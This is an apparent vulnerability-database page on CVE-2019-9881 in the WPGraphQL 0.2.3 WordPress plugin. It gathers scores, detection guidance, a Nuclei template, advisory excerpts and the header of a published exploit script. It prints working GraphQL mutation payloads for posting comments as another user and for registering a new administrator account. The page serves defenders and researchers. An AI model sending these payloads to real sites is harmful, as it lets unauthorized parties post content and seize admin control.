CVE-2019-9881
published 2019-06-10CVE-2019-9881: The createComment mutation in the WPGraphQL 0.2.3 plugin for WordPress allows unauthenticated users to post comments on any article, even when 'allow comment'…
PriorityP279medium5.3CVSS 3.0
AVNACLPRNUINSUCNILAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
18.83%
96.9th percentile
The createComment mutation in the WPGraphQL 0.2.3 plugin for WordPress allows unauthenticated users to post comments on any article, even when 'allow comment' is disabled.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wpengine | wpgraphql | — | — |
Detection & IOCsextracted from sources · hover to see the quote
command{"query": "mutation { createComment(input: { postId: 1, userId: 1, content: \"{{string}}\", clientMutationId: \"{{client}}\" }) { clientMutationId } }"}↗
commandmutation{createComment(input:{postId:<ID>,userId:<ID>,content:"<text>",clientMutationId:"UWHATM8",}){clientMutationId}}↗
commandmutation{registerUser(input:{clientMutationId:"UWHATM8",email:"<email>",password:"<password>",username:"<username>",roles:["administrator"]}){clientMutationId}}↗
- →Detect unauthenticated POST requests to /graphql containing the 'createComment' mutation with both 'postId' and 'userId' fields — no authentication headers required. ↗
- →Successful exploitation returns HTTP 200 with a JSON body containing 'createComment' and 'clientMutationId' keys inside a '{"data":' envelope. ↗
- →Detect unauthenticated POST requests to /graphql containing the 'registerUser' mutation with a 'roles:["administrator"]' field, indicating privilege escalation attempt. ↗
- →Shodan/FOFA fingerprint: WordPress sites exposing a /graphql endpoint can be identified via HTTP title 'WordPress' combined with 'graphql', or body containing '/wp-content/plugins/wp-graphql/'. ↗
- →The exploit script uses a fixed clientMutationId string 'UWHATM8' as a canary value; presence of this string in GraphQL mutation payloads is a strong indicator of exploit tool usage. ↗
- ·The vulnerability affects only WPGraphQL version 0.2.3 and earlier; version 0.3.0 and later are patched. Detections should be scoped to sites running the vulnerable plugin version. ↗
- ·The exploit covers three related CVEs (2019-9879, 2019-9880, 2019-9881) in the same plugin version; detections targeting the /graphql endpoint may fire on all three. ↗
CVSS provenance
nvdv3.05.3MEDIUMCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:P/A:N
vulncheck5.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-hhwc-x32h-p6qg: The createComment mutation in the WPGraphQL 0
ghsa_unreviewed·2022-05-24
CVE-2019-9881 [MEDIUM] CWE-306 GHSA-hhwc-x32h-p6qg: The createComment mutation in the WPGraphQL 0
The createComment mutation in the WPGraphQL 0.2.3 plugin for WordPress allows unauthenticated users to post comments on any article, even when 'allow comment' is disabled.
VulnCheck
wpengine wpgraphql Missing Authentication for Critical Function
vulncheck·2019·CVSS 5.3
CVE-2019-9881 [MEDIUM] wpengine wpgraphql Missing Authentication for Critical Function
wpengine wpgraphql Missing Authentication for Critical Function
The createComment mutation in the WPGraphQL 0.2.3 plugin for WordPress allows unauthenticated users to post comments on any article, even when 'allow comment' is disabled.
Affected: wpengine wpgraphql
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/
No detection rules found.
Exploit-DB
WordPress Plugin WPGraphQL 0.2.3 - Multiple Vulnerabilities
exploitdb·2019-05-21
CVE-2019-9881 WordPress Plugin WPGraphQL 0.2.3 - Multiple Vulnerabilities
WordPress Plugin WPGraphQL 0.2.3 - Multiple Vulnerabilities
---
#!/usr/bin/env python
#
# Author: Simone Quatrini of Pen Test Partners
# CVEs: 2019-9879, 2019-9880, 2019-9881
# Tested on Wordpress 5.1.1 and wp-graphql 0.2.3
# https://www.pentestpartners.com/security-blog/pwning-wordpress-graphql/
import argparse
import requests
import base64
import json
import sys
parser = argparse.ArgumentParser(description="wp-graphql <= 0.2.3 multi-exploit")
parser.add_argument('--url', action='store', dest='url', required=True, help="wp-graphql endpoint. e.g.: http://localhost/wordpress/graphql")
parser.add_argument('--post-comment', nargs=3, action='store', metavar=('postid','userid','commenttext'), dest='comment', required=False, help="Post comment impersonating a specific user. e.g.: --post-co
Nuclei
WPEngine WPGraphQL 0.2.3 - Unauthenticated Comment Posting
nuclei·CVSS 5.3
CVE-2019-9881 [MEDIUM] WPEngine WPGraphQL 0.2.3 - Unauthenticated Comment Posting
WPEngine WPGraphQL 0.2.3 - Unauthenticated Comment Posting
The createComment mutation in the WPGraphQL 0.2.3 plugin for WordPress allows unauthenticated users to post comments on any article, even when 'allow comment' is disabled.
Template:
id: CVE-2019-9881
info:
name: WPEngine WPGraphQL 0.2.3 - Unauthenticated Comment Posting
author: intelligent-ears
severity: medium
description: |
The createComment mutation in the WPGraphQL 0.2.3 plugin for WordPress allows unauthenticated users to post comments on any article, even when 'allow comment' is disabled.
impact: |
An attacker can exploit this vulnerability to post unauthorized comments on WordPress posts, potentially leading to content manipulation and defacement.
remediation: |
Update WPGraphQL to version 0.3.0 or later to fix this vuln
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
CVE-2020-28188 [HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
# Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020. Several newly observed exploits, including CVE-2020-28188, CVE-2020-17519, and CVE-2020-29227, have emerged and were continuously being exploited in the wild as of late 2020 to early 2021.
This blog provides details of the newly observed exploits as well as a dive deep into the exploitation analysis, vendor analysis, attack origin, and attack category distribution.
Palo Alto Networks Next-Generation Firewall customers are protected from these attacks with the URL Filtering an
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
[HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
Threat Research Center
Trend Reports
Vulnerabilities
## Network Attack Trends: Internet of Threats (November 2020-January 2021)
Lei Xu
Yue Guan
Vaibhav Singhal
Published: April 12, 2021
Malware
Trend Reports
Vulnerabilities
Botnet
DDoS
Exploit kit
IoT
Network security trends
## Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020 . Several newly observed exploits, including CVE-2020-28188 , CVE-2020-17519 , and CVE-2020-29227 , have emerged and were continuously being exploited in the wild as of late 2020 to earl
http://packetstormsecurity.com/files/153025/WordPress-WPGraphQL-0.2.3-Authentication-Bypass-Information-Disclosure.htmlhttps://github.com/pentestpartners/snippets/blob/master/wp-graphql0.2.3_exploit.pyhttps://github.com/wp-graphql/wp-graphql/releases/tag/v0.3.0https://wpvulndb.com/vulnerabilities/9282https://www.pentestpartners.com/security-blog/pwning-wordpress-graphql/http://packetstormsecurity.com/files/153025/WordPress-WPGraphQL-0.2.3-Authentication-Bypass-Information-Disclosure.htmlhttps://github.com/pentestpartners/snippets/blob/master/wp-graphql0.2.3_exploit.pyhttps://github.com/wp-graphql/wp-graphql/releases/tag/v0.3.0https://wpvulndb.com/vulnerabilities/9282https://www.pentestpartners.com/security-blog/pwning-wordpress-graphql/
2019-06-10
Published
Exploited in the wild